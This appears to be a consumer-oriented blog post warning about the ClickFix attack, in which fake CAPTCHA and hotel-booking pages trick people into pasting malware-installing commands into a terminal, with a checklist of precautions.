Photo by Zulfugar Karimov on Unsplash
You know that little string of text you copied and pasted into your terminal because a website told you to? That’s all it takes for your computer to be completely compromised.
It sounds almost too simple — and that’s exactly the problem.
Over the past year, scammers have pulled off one of the sneakiest and fastest-growing cyberattacks most people still haven’t heard of. It’s called ClickFix — a quick, clever technique that works on both Windows and macOS. And it’s spreading fast, right under the radar.
What is ClickFix?
ClickFix isn’t your typical phishing email. It’s smarter and more believable. It often starts with a message that seems legit — like an email from a hotel you just booked, complete with your reservation details. In other cases, it might come in through WhatsApp, or even show up at the top of a Google search result.
Once you click the link, you’re taken to a slick website that looks trustworthy. It might claim to be a CAPTCHA check or some kind of human verification. Then it asks you to do one simple thing:
Copy a line of text. Open Terminal or Command Prompt. Paste it. Press Enter.
That single line is the magic bullet.
In reality, the command quietly connects your device to a hacker-controlled server. From there, malware is downloaded and installed on your machine — without any warning or signs. No pop-ups. No antivirus alert. Just like that, your system is compromised.
Photo by Miguel A Amutio on Unsplash
The Damage Behind the Click
So, what exactly gets installed?
- Credential stealers, like a malware called Shamos, which grabs your saved passwords
- Fake cryptocurrency wallets designed to steal your coins
- Botnet software, turning your computer into someone else’s tool
- Configuration tweaks to make sure the malware survives reboot
Another trick: depending on the device you’re using, the site may adapt and serve you the right kind of malware for your Windows or Mac system. Security firm Push Security even described versions where the page changes itself based on your OS.
Microsoft also flagged these attacks for using “LOLbins” — short for “living off the land binaries.” Basically, these are benign system tools used in a malicious way. Since these tools are part of your system already, they don’t trigger the usual antivirus alarms.
Why It Works: Trust and Timing
ClickFix doesn’t count on you being naive. It counts on you being in a rush. Say your hotel booking email tells you there’s a problem. You’re about to leave for your trip, you don’t want to mess it up, and the site looks just real enough. That’s when the scam works best.
Researchers from Sekoia found that many campaigns start by hijacking real accounts on travel booking platforms. The attacker gets access to genuine reservation info and sends realistic instructions to victims, who have no idea they’re talking to scammers.
Even the CAPTCHAs on fake pages are nearly identical to the ones used by services like Cloudflare. The attack blends in just enough to not raise alarms.
So What Can You Do?
Here’s the tough part: traditional antivirus tools, like Microsoft Defender, can catch some of these attacks — but not all of them. And once you paste and run that command yourself, you’ve basically given the malware permission.
That’s why the best defense, for now, is good old-fashioned awareness.
Heading into the holiday season, this is something worth bringing up at the dinner table. If someone in your family books hotels online, uses Google to search for links, or has Chrome and Terminal open at the same time — they need to know about ClickFix.
Tell them not to copy and paste any commands into Terminal or Command Prompt unless they’re 100% sure where it came from and what it does.
Here’s A Quick Checklist to Stay Safe:
- Don’t enter commands into Terminal or Windows Command Prompt unless you trust the source completely.
- Be wary of unexpected emails/messages, even if they look like they come from legit services.
- Got a CAPTCHA that asks you to run terminal code? That’s a red flag.
- Always double-check URLs in emails and search results before clicking. Even the top result can be compromised.
- Keep macOS, Windows, and browser software updated — it’s not foolproof, but it helps.
Bottom line: if a random website tells you to copy-paste a line of code “just to confirm your humanity,” that’s not normal. That’s ClickFix.
And it only takes one click to regret it.
